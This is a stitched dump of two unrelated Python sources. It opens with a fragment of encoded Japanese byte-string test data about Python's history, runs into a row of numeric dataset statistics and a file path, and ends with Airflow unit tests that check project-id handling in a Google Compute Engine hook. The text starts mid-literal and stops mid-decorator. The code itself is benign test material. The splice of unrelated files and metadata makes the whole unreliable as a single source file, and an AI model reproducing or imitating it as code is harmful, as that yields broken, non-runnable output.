"\x83\x9d\xe3\x83\xaa\xe3\x82\xb7\xe3\x83\xbc\xe3\x81\xa7\xe3\x81"
"\x99\xe3\x80\x82\x0a\x0a"),
'shift_jisx0213': (
"\x50\x79\x74\x68\x6f\x6e\x20\x82\xcc\x8a\x4a\x94\xad\x82\xcd\x81"
"\x41\x31\x39\x39\x30\x20\x94\x4e\x82\xb2\x82\xeb\x82\xa9\x82\xe7"
"\x8a\x4a\x8e\x6e\x82\xb3\x82\xea\x82\xc4\x82\xa2\x82\xdc\x82\xb7"
"\x81\x42\x0a\x8a\x4a\x94\xad\x8e\xd2\x82\xcc\x20\x47\x75\x69\x64"
"\x6f\x20\x76\x61\x6e\x20\x52\x6f\x73\x73\x75\x6d\x20\x82\xcd\x8b"
"\xb3\x88\xe7\x97\x70\x82\xcc\x83\x76\x83\x8d\x83\x4f\x83\x89\x83"
"\x7e\x83\x93\x83\x4f\x8c\xbe\x8c\xea\x81\x75\x41\x42\x43\x81\x76"
"\x82\xcc\x8a\x4a\x94\xad\x82\xc9\x8e\x51\x89\xc1\x82\xb5\x82\xc4"
"\x82\xa2\x82\xdc\x82\xb5\x82\xbd\x82\xaa\x81\x41\x41\x42\x43\x20"
"\x82\xcd\x8e\xc0\x97\x70\x8f\xe3\x82\xcc\x96\xda\x93\x49\x82\xc9"
"\x82\xcd\x82\xa0\x82\xdc\x82\xe8\x93\x4b\x82\xb5\x82\xc4\x82\xa2"
"\x82\xdc\x82\xb9\x82\xf1\x82\xc5\x82\xb5\x82\xbd\x81\x42\x0a\x82"
"\xb1\x82\xcc\x82\xbd\x82\xdf\x81\x41\x47\x75\x69\x64\x6f\x20\x82"
"\xcd\x82\xe6\x82\xe8\x8e\xc0\x97\x70\x93\x49\x82\xc8\x83\x76\x83"
"\x8d\x83\x4f\x83\x89\x83\x7e\x83\x93\x83\x4f\x8c\xbe\x8c\xea\x82"
"\xcc\x8a\x4a\x94\xad\x82\xf0\x8a\x4a\x8e\x6e\x82\xb5\x81\x41\x89"
"\x70\x8d\x91\x20\x42\x42\x53\x20\x95\xfa\x91\x97\x82\xcc\x83\x52"
"\x83\x81\x83\x66\x83\x42\x94\xd4\x91\x67\x81\x75\x83\x82\x83\x93"
"\x83\x65\x83\x42\x20\x83\x70\x83\x43\x83\x5c\x83\x93\x81\x76\x82"
"\xcc\x83\x74\x83\x40\x83\x93\x82\xc5\x82\xa0\x82\xe9\x20\x47\x75"
"\x69\x64\x6f\x20\x82\xcd\x82\xb1\x82\xcc\x8c\xbe\x8c\xea\x82\xf0"
"\x81\x75\x50\x79\x74\x68\x6f\x6e\x81\x76\x82\xc6\x96\xbc\x82\xc3"
"\x82\xaf\x82\xdc\x82\xb5\x82\xbd\x81\x42\x0a\x82\xb1\x82\xcc\x82"
"\xe6\x82\xa4\x82\xc8\x94\x77\x8c\x69\x82\xa9\x82\xe7\x90\xb6\x82"
"\xdc\x82\xea\x82\xbd\x20\x50\x79\x74\x68\x6f\x6e\x20\x82\xcc\x8c"
"\xbe\x8c\xea\x90\xdd\x8c\x76\x82\xcd\x81\x41\x81\x75\x83\x56\x83"
"\x93\x83\x76\x83\x8b\x81\x76\x82\xc5\x81\x75\x8f\x4b\x93\xbe\x82"
"\xaa\x97\x65\x88\xd5\x81\x76\x82\xc6\x82\xa2\x82\xa4\x96\xda\x95"
"\x57\x82\xc9\x8f\x64\x93\x5f\x82\xaa\x92\x75\x82\xa9\x82\xea\x82"
"\xc4\x82\xa2\x82\xdc\x82\xb7\x81\x42\x0a\x91\xbd\x82\xad\x82\xcc"
"\x83\x58\x83\x4e\x83\x8a\x83\x76\x83\x67\x8c\x6e\x8c\xbe\x8c\xea"
"\x82\xc5\x82\xcd\x83\x86\x81\x5b\x83\x55\x82\xcc\x96\xda\x90\xe6"
"\x82\xcc\x97\x98\x95\xd6\x90\xab\x82\xf0\x97\x44\x90\xe6\x82\xb5"
"\x82\xc4\x90\x46\x81\x58\x82\xc8\x8b\x40\x94\x5c\x82\xf0\x8c\xbe"
"\x8c\xea\x97\x76\x91\x66\x82\xc6\x82\xb5\x82\xc4\x8e\xe6\x82\xe8"
"\x93\xfc\x82\xea\x82\xe9\x8f\xea\x8d\x87\x82\xaa\x91\xbd\x82\xa2"
"\x82\xcc\x82\xc5\x82\xb7\x82\xaa\x81\x41\x50\x79\x74\x68\x6f\x6e"
"\x20\x82\xc5\x82\xcd\x82\xbb\x82\xa4\x82\xa2\x82\xc1\x82\xbd\x8f"
"\xac\x8d\xd7\x8d\x48\x82\xaa\x92\xc7\x89\xc1\x82\xb3\x82\xea\x82"
"\xe9\x82\xb1\x82\xc6\x82\xcd\x82\xa0\x82\xdc\x82\xe8\x82\xa0\x82"
"\xe8\x82\xdc\x82\xb9\x82\xf1\x81\x42\x0a\x8c\xbe\x8c\xea\x8e\xa9"
"\x91\xcc\x82\xcc\x8b\x40\x94\x5c\x82\xcd\x8d\xc5\x8f\xac\x8c\xc0"
"\x82\xc9\x89\x9f\x82\xb3\x82\xa6\x81\x41\x95\x4b\x97\x76\x82\xc8"
"\x8b\x40\x94\x5c\x82\xcd\x8a\x67\x92\xa3\x83\x82\x83\x57\x83\x85"
"\x81\x5b\x83\x8b\x82\xc6\x82\xb5\x82\xc4\x92\xc7\x89\xc1\x82\xb7"
"\x82\xe9\x81\x41\x82\xc6\x82\xa2\x82\xa4\x82\xcc\x82\xaa\x20\x50"
"\x79\x74\x68\x6f\x6e\x20\x82\xcc\x83\x7c\x83\x8a\x83\x56\x81\x5b"
"\x82\xc5\x82\xb7\x81\x42\x0a\x0a\x83\x6d\x82\xf5\x20\x83\x9e\x20"
"\x83\x67\x83\x4c\x88\x4b\x88\x79\x20\x98\x83\xfc\xd6\x20\xfc\xd2"
"\xfc\xe6\xfb\xd4\x0a",
"\x50\x79\x74\x68\x6f\x6e\x20\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba"
"\xe3\x81\xaf\xe3\x80\x81\x31\x39\x39\x30\x20\xe5\xb9\xb4\xe3\x81"
"\x94\xe3\x82\x8d\xe3\x81\x8b\xe3\x82\x89\xe9\x96\x8b\xe5\xa7\x8b"
"\xe3\x81\x95\xe3\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3"
"\x81\x99\xe3\x80\x82\x0a\xe9\x96\x8b\xe7\x99\xba\xe8\x80\x85\xe3"
"\x81\xae\x20\x47\x75\x69\x64\x6f\x20\x76\x61\x6e\x20\x52\x6f\x73"
"\x73\x75\x6d\x20\xe3\x81\xaf\xe6\x95\x99\xe8\x82\xb2\xe7\x94\xa8"
"\xe3\x81\xae\xe3\x83\x97\xe3\x83\xad\xe3\x82\xb0\xe3\x83\xa9\xe3"
"\x83\x9f\xe3\x83\xb3\xe3\x82\xb0\xe8\xa8\x80\xe8\xaa\x9e\xe3\x80"
"\x8c\x41\x42\x43\xe3\x80\x8d\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba"
"\xe3\x81\xab\xe5\x8f\x82\xe5\x8a\xa0\xe3\x81\x97\xe3\x81\xa6\xe3"
"\x81\x84\xe3\x81\xbe\xe3\x81\x97\xe3\x81\x9f\xe3\x81\x8c\xe3\x80"
"\x81\x41\x42\x43\x20\xe3\x81\xaf\xe5\xae\x9f\xe7\x94\xa8\xe4\xb8"
"\x8a\xe3\x81\xae\xe7\x9b\xae\xe7\x9a\x84\xe3\x81\xab\xe3\x81\xaf"
"\xe3\x81\x82\xe3\x81\xbe\xe3\x82\x8a\xe9\x81\xa9\xe3\x81\x97\xe3"
"\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x9b\xe3\x82\x93\xe3\x81"
"\xa7\xe3\x81\x97\xe3\x81\x9f\xe3\x80\x82\x0a\xe3\x81\x93\xe3\x81"
"\xae\xe3\x81\x9f\xe3\x82\x81\xe3\x80\x81\x47\x75\x69\x64\x6f\x20"
"\xe3\x81\xaf\xe3\x82\x88\xe3\x82\x8a\xe5\xae\x9f\xe7\x94\xa8\xe7"
"\x9a\x84\xe3\x81\xaa\xe3\x83\x97\xe3\x83\xad\xe3\x82\xb0\xe3\x83"
"\xa9\xe3\x83\x9f\xe3\x83\xb3\xe3\x82\xb0\xe8\xa8\x80\xe8\xaa\x9e"
"\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba\xe3\x82\x92\xe9\x96\x8b\xe5"
"\xa7\x8b\xe3\x81\x97\xe3\x80\x81\xe8\x8b\xb1\xe5\x9b\xbd\x20\x42"
"\x42\x53\x20\xe6\x94\xbe\xe9\x80\x81\xe3\x81\xae\xe3\x82\xb3\xe3"
"\x83\xa1\xe3\x83\x87\xe3\x82\xa3\xe7\x95\xaa\xe7\xb5\x84\xe3\x80"
"\x8c\xe3\x83\xa2\xe3\x83\xb3\xe3\x83\x86\xe3\x82\xa3\x20\xe3\x83"
"\x91\xe3\x82\xa4\xe3\x82\xbd\xe3\x83\xb3\xe3\x80\x8d\xe3\x81\xae"
"\xe3\x83\x95\xe3\x82\xa1\xe3\x83\xb3\xe3\x81\xa7\xe3\x81\x82\xe3"
"\x82\x8b\x20\x47\x75\x69\x64\x6f\x20\xe3\x81\xaf\xe3\x81\x93\xe3"
"\x81\xae\xe8\xa8\x80\xe8\xaa\x9e\xe3\x82\x92\xe3\x80\x8c\x50\x79"
"\x74\x68\x6f\x6e\xe3\x80\x8d\xe3\x81\xa8\xe5\x90\x8d\xe3\x81\xa5"
"\xe3\x81\x91\xe3\x81\xbe\xe3\x81\x97\xe3\x81\x9f\xe3\x80\x82\x0a"
"\xe3\x81\x93\xe3\x81\xae\xe3\x82\x88\xe3\x81\x86\xe3\x81\xaa\xe8"
"\x83\x8c\xe6\x99\xaf\xe3\x81\x8b\xe3\x82\x89\xe7\x94\x9f\xe3\x81"
"\xbe\xe3\x82\x8c\xe3\x81\x9f\x20\x50\x79\x74\x68\x6f\x6e\x20\xe3"
"\x81\xae\xe8\xa8\x80\xe8\xaa\x9e\xe8\xa8\xad\xe8\xa8\x88\xe3\x81"
"\xaf\xe3\x80\x81\xe3\x80\x8c\xe3\x82\xb7\xe3\x83\xb3\xe3\x83\x97"
"\xe3\x83\xab\xe3\x80\x8d\xe3\x81\xa7\xe3\x80\x8c\xe7\xbf\x92\xe5"
"\xbe\x97\xe3\x81\x8c\xe5\xae\xb9\xe6\x98\x93\xe3\x80\x8d\xe3\x81"
"\xa8\xe3\x81\x84\xe3\x81\x86\xe7\x9b\xae\xe6\xa8\x99\xe3\x81\xab"
"\xe9\x87\x8d\xe7\x82\xb9\xe3\x81\x8c\xe7\xbd\xae\xe3\x81\x8b\xe3"
"\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x99\xe3\x80"
"\x82\x0a\xe5\xa4\x9a\xe3\x81\x8f\xe3\x81\xae\xe3\x82\xb9\xe3\x82"
"\xaf\xe3\x83\xaa\xe3\x83\x97\xe3\x83\x88\xe7\xb3\xbb\xe8\xa8\x80"
"\xe8\xaa\x9e\xe3\x81\xa7\xe3\x81\xaf\xe3\x83\xa6\xe3\x83\xbc\xe3"
"\x82\xb6\xe3\x81\xae\xe7\x9b\xae\xe5\x85\x88\xe3\x81\xae\xe5\x88"
"\xa9\xe4\xbe\xbf\xe6\x80\xa7\xe3\x82\x92\xe5\x84\xaa\xe5\x85\x88"
"\xe3\x81\x97\xe3\x81\xa6\xe8\x89\xb2\xe3\x80\x85\xe3\x81\xaa\xe6"
"\xa9\x9f\xe8\x83\xbd\xe3\x82\x92\xe8\xa8\x80\xe8\xaa\x9e\xe8\xa6"
"\x81\xe7\xb4\xa0\xe3\x81\xa8\xe3\x81\x97\xe3\x81\xa6\xe5\x8f\x96"
"\xe3\x82\x8a\xe5\x85\xa5\xe3\x82\x8c\xe3\x82\x8b\xe5\xa0\xb4\xe5"
"\x90\x88\xe3\x81\x8c\xe5\xa4\x9a\xe3\x81\x84\xe3\x81\xae\xe3\x81"
"\xa7\xe3\x81\x99\xe3\x81\x8c\xe3\x80\x81\x50\x79\x74\x68\x6f\x6e"
"\x20\xe3\x81\xa7\xe3\x81\xaf\xe3\x81\x9d\xe3\x81\x86\xe3\x81\x84"
"\xe3\x81\xa3\xe3\x81\x9f\xe5\xb0\x8f\xe7\xb4\xb0\xe5\xb7\xa5\xe3"
"\x81\x8c\xe8\xbf\xbd\xe5\x8a\xa0\xe3\x81\x95\xe3\x82\x8c\xe3\x82"
"\x8b\xe3\x81\x93\xe3\x81\xa8\xe3\x81\xaf\xe3\x81\x82\xe3\x81\xbe"
"\xe3\x82\x8a\xe3\x81\x82\xe3\x82\x8a\xe3\x81\xbe\xe3\x81\x9b\xe3"
"\x82\x93\xe3\x80\x82\x0a\xe8\xa8\x80\xe8\xaa\x9e\xe8\x87\xaa\xe4"
"\xbd\x93\xe3\x81\xae\xe6\xa9\x9f\xe8\x83\xbd\xe3\x81\xaf\xe6\x9c"
"\x80\xe5\xb0\x8f\xe9\x99\x90\xe3\x81\xab\xe6\x8a\xbc\xe3\x81\x95"
"\xe3\x81\x88\xe3\x80\x81\xe5\xbf\x85\xe8\xa6\x81\xe3\x81\xaa\xe6"
"\xa9\x9f\xe8\x83\xbd\xe3\x81\xaf\xe6\x8b\xa1\xe5\xbc\xb5\xe3\x83"
"\xa2\xe3\x82\xb8\xe3\x83\xa5\xe3\x83\xbc\xe3\x83\xab\xe3\x81\xa8"
"\xe3\x81\x97\xe3\x81\xa6\xe8\xbf\xbd\xe5\x8a\xa0\xe3\x81\x99\xe3"
"\x82\x8b\xe3\x80\x81\xe3\x81\xa8\xe3\x81\x84\xe3\x81\x86\xe3\x81"
"\xae\xe3\x81\x8c\x20\x50\x79\x74\x68\x6f\x6e\x20\xe3\x81\xae\xe3"
"\x83\x9d\xe3\x83\xaa\xe3\x82\xb7\xe3\x83\xbc\xe3\x81\xa7\xe3\x81"
"\x99\xe3\x80\x82\x0a\x0a\xe3\x83\x8e\xe3\x81\x8b\xe3\x82\x9a\x20"
"\xe3\x83\x88\xe3\x82\x9a\x20\xe3\x83\x88\xe3\x82\xad\xef\xa8\xb6"
"\xef\xa8\xb9\x20\xf0\xa1\x9a\xb4\xf0\xaa\x8e\x8c\x20\xe9\xba\x80"
"\xe9\xbd\x81\xf0\xa9\x9b\xb0\x0a"),
}
| 65.562745 | 68 | 0.715256 | 15,930 | 66,874 | 3.002323 | 0.013748 | 0.065486 | 0.014302 | 0.01656 | 0.896377 | 0.891296 | 0.882702 | 0.879691 | 0.873774 | 0.870387 | 0 | 0.281405 | 0.015447 | 66,874 | 1,019 | 69 | 65.627085 | 0.444996 | 0 | 0 | 0.791953 | 0 | 0.968597 | 0.953046 | 0.950624 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
316ac1eced4da8e44f47942984ca4a75f48c8630 | 36,428 | py | Python | tests/gcp/hooks/test_gcp_compute_hook.py | barseghyanartur/airflow | 16b8381dc87bb8c323412aa48b0d51b8a31479c1 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | tests/gcp/hooks/test_gcp_compute_hook.py | barseghyanartur/airflow | 16b8381dc87bb8c323412aa48b0d51b8a31479c1 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | tests/gcp/hooks/test_gcp_compute_hook.py | barseghyanartur/airflow | 16b8381dc87bb8c323412aa48b0d51b8a31479c1 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=too-many-lines
import unittest
from tests.contrib.utils.base_gcp_mock import mock_base_gcp_hook_no_default_project_id, \
mock_base_gcp_hook_default_project_id, GCP_PROJECT_ID_HOOK_UNIT_TEST
from tests.compat import mock, PropertyMock
from airflow import AirflowException
from airflow.gcp.hooks.compute import GceHook, GceOperationStatus
# Fixture values shared by every GceHook test below; the tests assert that
# these exact strings are forwarded to the mocked GCE API client.
GCE_ZONE = 'zone'
GCE_INSTANCE = 'instance'
GCE_INSTANCE_TEMPLATE = 'instance-template'
GCE_REQUEST_ID = 'request_id'
GCE_INSTANCE_GROUP_MANAGER = 'instance_group_manager'
class TestGcpComputeHookNoDefaultProjectId(unittest.TestCase):
    """Tests for GceHook when the GCP connection supplies no default project id.

    Every operation must either receive an explicit ``project_id`` or raise
    AirflowException.  ``get_conn`` and ``_wait_for_operation_to_complete``
    are mocked throughout, so no real API requests are made.
    """
    def setUp(self):
        # Patch the base hook's __init__ so no real credentials/connection are needed.
        with mock.patch('airflow.contrib.hooks.gcp_api_base_hook.GoogleCloudBaseHook.__init__',
                        new=mock_base_gcp_hook_no_default_project_id):
            self.gce_hook_no_project_id = GceHook(gcp_conn_id='test')
    @mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
    @mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
    def test_start_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
        """start_instance with an explicit project_id issues the API call and waits."""
        start_method = get_conn.return_value.instances.return_value.start
        execute_method = start_method.return_value.execute
        execute_method.return_value = {"name": "operation_id"}
        wait_for_operation_to_complete.return_value = None
        res = self.gce_hook_no_project_id.start_instance(
            project_id='example-project',
            zone=GCE_ZONE,
            resource_id=GCE_INSTANCE)
        self.assertIsNone(res)
        start_method.assert_called_once_with(instance='instance', project='example-project', zone='zone')
        execute_method.assert_called_once_with(num_retries=5)
        wait_for_operation_to_complete.assert_called_once_with(project_id='example-project',
                                                               operation_name='operation_id',
                                                               zone='zone')
    @mock.patch(
        'airflow.contrib.hooks.gcp_api_base_hook.GoogleCloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=None
    )
    @mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
    @mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
    def test_start_instance_no_project_id(self, wait_for_operation_to_complete, get_conn, mock_project_id):
        """start_instance without a project_id raises and performs no API call."""
        start_method = get_conn.return_value.instances.return_value.start
        execute_method = start_method.return_value.execute
        execute_method.return_value = {"name": "operation_id"}
        wait_for_operation_to_complete.return_value = None
        with self.assertRaises(AirflowException) as cm:
            self.gce_hook_no_project_id.start_instance(
                zone=GCE_ZONE,
                resource_id=GCE_INSTANCE)
        start_method.assert_not_called()
        execute_method.assert_not_called()
        err = cm.exception
        self.assertIn("The project id must be passed", str(err))
        wait_for_operation_to_complete.assert_not_called()
    @mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
    @mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
    def test_stop_instance_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
        """stop_instance with an explicit project_id issues the API call and waits."""
        stop_method = get_conn.return_value.instances.return_value.stop
        execute_method = stop_method.return_value.execute
        execute_method.return_value = {"name": "operation_id"}
        wait_for_operation_to_complete.return_value = None
        res = self.gce_hook_no_project_id.stop_instance(
            project_id='example-project',
            zone=GCE_ZONE,
            resource_id=GCE_INSTANCE)
        self.assertIsNone(res)
        stop_method.assert_called_once_with(instance='instance', project='example-project', zone='zone')
        execute_method.assert_called_once_with(num_retries=5)
        wait_for_operation_to_complete.assert_called_once_with(project_id='example-project',
                                                               operation_name='operation_id',
                                                               zone='zone')
    @mock.patch(
        'airflow.contrib.hooks.gcp_api_base_hook.GoogleCloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=None
    )
    @mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
    @mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
    def test_stop_instance_no_project_id(self, wait_for_operation_to_complete, get_conn, mock_project_id):
        """stop_instance without a project_id raises and performs no API call."""
        stop_method = get_conn.return_value.instances.return_value.stop
        execute_method = stop_method.return_value.execute
        execute_method.return_value = {"name": "operation_id"}
        wait_for_operation_to_complete.return_value = None
        with self.assertRaises(AirflowException) as cm:
            self.gce_hook_no_project_id.stop_instance(
                zone=GCE_ZONE,
                resource_id=GCE_INSTANCE)
        stop_method.assert_not_called()
        execute_method.assert_not_called()
        err = cm.exception
        self.assertIn("The project id must be passed", str(err))
        wait_for_operation_to_complete.assert_not_called()
    @mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
    @mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
    def test_set_machine_type_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
        """set_machine_type with an explicit project_id issues the API call and waits."""
        set_machine_type_method = get_conn.return_value.instances.return_value.setMachineType
        execute_method = set_machine_type_method.return_value.execute
        execute_method.return_value = {"name": "operation_id"}
        wait_for_operation_to_complete.return_value = None
        res = self.gce_hook_no_project_id.set_machine_type(
            body={},
            project_id='example-project',
            zone=GCE_ZONE,
            resource_id=GCE_INSTANCE)
        self.assertIsNone(res)
        set_machine_type_method.assert_called_once_with(body={}, instance='instance',
                                                        project='example-project', zone='zone')
        execute_method.assert_called_once_with(num_retries=5)
        wait_for_operation_to_complete.assert_called_once_with(project_id='example-project',
                                                               operation_name='operation_id',
                                                               zone='zone')
    @mock.patch(
        'airflow.contrib.hooks.gcp_api_base_hook.GoogleCloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=None
    )
    @mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
    @mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
    def test_set_machine_type_no_project_id(self, wait_for_operation_to_complete, get_conn, mock_project_id):
        """set_machine_type without a project_id raises and performs no API call."""
        set_machine_type_method = get_conn.return_value.instances.return_value.setMachineType
        execute_method = set_machine_type_method.return_value.execute
        execute_method.return_value = {"name": "operation_id"}
        wait_for_operation_to_complete.return_value = None
        with self.assertRaises(AirflowException) as cm:
            self.gce_hook_no_project_id.set_machine_type(
                body={},
                zone=GCE_ZONE,
                resource_id=GCE_INSTANCE)
        set_machine_type_method.assert_not_called()
        execute_method.assert_not_called()
        err = cm.exception
        self.assertIn("The project id must be passed", str(err))
        wait_for_operation_to_complete.assert_not_called()
    @mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
    @mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
    def test_get_instance_template_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
        """get_instance_template with an explicit project_id returns the API result without waiting."""
        get_method = get_conn.return_value.instanceTemplates.return_value.get
        execute_method = get_method.return_value.execute
        execute_method.return_value = {"name": "operation_id"}
        wait_for_operation_to_complete.return_value = None
        res = self.gce_hook_no_project_id.get_instance_template(
            resource_id=GCE_INSTANCE_TEMPLATE,
            project_id='example-project'
        )
        self.assertIsNotNone(res)
        get_method.assert_called_once_with(instanceTemplate='instance-template', project='example-project')
        execute_method.assert_called_once_with(num_retries=5)
        wait_for_operation_to_complete.assert_not_called()
    @mock.patch(
        'airflow.contrib.hooks.gcp_api_base_hook.GoogleCloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=None
    )
    @mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
    @mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
    def test_get_instance_template_no_project_id(
        self, wait_for_operation_to_complete, get_conn, mock_project_id
    ):
        """get_instance_template without a project_id raises and performs no API call."""
        get_method = get_conn.return_value.instanceTemplates.return_value.get
        execute_method = get_method.return_value.execute
        execute_method.return_value = {"name": "operation_id"}
        wait_for_operation_to_complete.return_value = None
        with self.assertRaises(AirflowException) as cm:
            self.gce_hook_no_project_id.get_instance_template(
                resource_id=GCE_INSTANCE_TEMPLATE
            )
        get_method.assert_not_called()
        execute_method.assert_not_called()
        err = cm.exception
        self.assertIn("The project id must be passed", str(err))
        wait_for_operation_to_complete.assert_not_called()
    @mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
    @mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
    def test_insert_instance_template_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
        """insert_instance_template with an explicit project_id issues the API call and waits."""
        insert_method = get_conn.return_value.instanceTemplates.return_value.insert
        execute_method = insert_method.return_value.execute
        execute_method.return_value = {"name": "operation_id"}
        wait_for_operation_to_complete.return_value = None
        res = self.gce_hook_no_project_id.insert_instance_template(
            project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
            body={},
            request_id=GCE_REQUEST_ID
        )
        self.assertIsNone(res)
        insert_method.assert_called_once_with(body={}, project='example-project', requestId='request_id')
        execute_method.assert_called_once_with(num_retries=5)
        wait_for_operation_to_complete.assert_called_once_with(project_id='example-project',
                                                               operation_name='operation_id')
    @mock.patch(
        'airflow.contrib.hooks.gcp_api_base_hook.GoogleCloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=None
    )
    @mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
    @mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
    def test_insert_instance_template_no_project_id(
        self, wait_for_operation_to_complete, get_conn, mock_project_id
    ):
        """insert_instance_template without a project_id raises and performs no API call."""
        insert_method = get_conn.return_value.instanceTemplates.return_value.insert
        execute_method = insert_method.return_value.execute
        execute_method.return_value = {"name": "operation_id"}
        wait_for_operation_to_complete.return_value = None
        with self.assertRaises(AirflowException) as cm:
            self.gce_hook_no_project_id.insert_instance_template(
                body={},
                request_id=GCE_REQUEST_ID
            )
        insert_method.assert_not_called()
        execute_method.assert_not_called()
        err = cm.exception
        self.assertIn("The project id must be passed", str(err))
        wait_for_operation_to_complete.assert_not_called()
    @mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
    @mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
    def test_get_instance_group_manager_overridden_project_id(self, wait_for_operation_to_complete, get_conn):
        """get_instance_group_manager with an explicit project_id returns the API result without waiting."""
        get_method = get_conn.return_value.instanceGroupManagers.return_value.get
        execute_method = get_method.return_value.execute
        execute_method.return_value = {"name": "operation_id"}
        wait_for_operation_to_complete.return_value = None
        res = self.gce_hook_no_project_id.get_instance_group_manager(
            project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
            zone=GCE_ZONE,
            resource_id=GCE_INSTANCE_GROUP_MANAGER
        )
        self.assertIsNotNone(res)
        get_method.assert_called_once_with(instanceGroupManager='instance_group_manager',
                                           project='example-project',
                                           zone='zone')
        execute_method.assert_called_once_with(num_retries=5)
        wait_for_operation_to_complete.assert_not_called()
    @mock.patch(
        'airflow.contrib.hooks.gcp_api_base_hook.GoogleCloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=None
    )
    @mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
    @mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
    def test_get_instance_group_manager_no_project_id(
        self, wait_for_operation_to_complete, get_conn, mock_project_id
    ):
        """get_instance_group_manager without a project_id raises and performs no API call."""
        get_method = get_conn.return_value.instanceGroupManagers.return_value.get
        execute_method = get_method.return_value.execute
        execute_method.return_value = {"name": "operation_id"}
        wait_for_operation_to_complete.return_value = None
        with self.assertRaises(AirflowException) as cm:
            self.gce_hook_no_project_id.get_instance_group_manager(
                zone=GCE_ZONE,
                resource_id=GCE_INSTANCE_GROUP_MANAGER
            )
        get_method.assert_not_called()
        execute_method.assert_not_called()
        err = cm.exception
        self.assertIn("The project id must be passed", str(err))
        wait_for_operation_to_complete.assert_not_called()
    @mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
    @mock.patch('airflow.gcp.hooks.compute.GceHook._wait_for_operation_to_complete')
    def test_patch_instance_group_manager_overridden_project_id(self,
                                                                wait_for_operation_to_complete, get_conn):
        """patch_instance_group_manager with an explicit project_id issues the API call and waits."""
        patch_method = get_conn.return_value.instanceGroupManagers.return_value.patch
        execute_method = patch_method.return_value.execute
        execute_method.return_value = {"name": "operation_id"}
        wait_for_operation_to_complete.return_value = None
        res = self.gce_hook_no_project_id.patch_instance_group_manager(
            project_id=GCP_PROJECT_ID_HOOK_UNIT_TEST,
            zone=GCE_ZONE,
            resource_id=GCE_INSTANCE_GROUP_MANAGER,
            body={},
            request_id=GCE_REQUEST_ID
        )
        self.assertIsNone(res)
        patch_method.assert_called_once_with(
            body={},
            instanceGroupManager='instance_group_manager',
            project='example-project',
            requestId='request_id',
            zone='zone'
        )
        execute_method.assert_called_once_with(num_retries=5)
        wait_for_operation_to_complete.assert_called_once_with(operation_name='operation_id',
                                                               project_id='example-project',
                                                               zone='zone')
    @mock.patch(
        'airflow.contrib.hooks.gcp_api_base_hook.GoogleCloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=None
    )
    @mock.patch('airflow.gcp.hooks.compute.GceHook.get_conn')
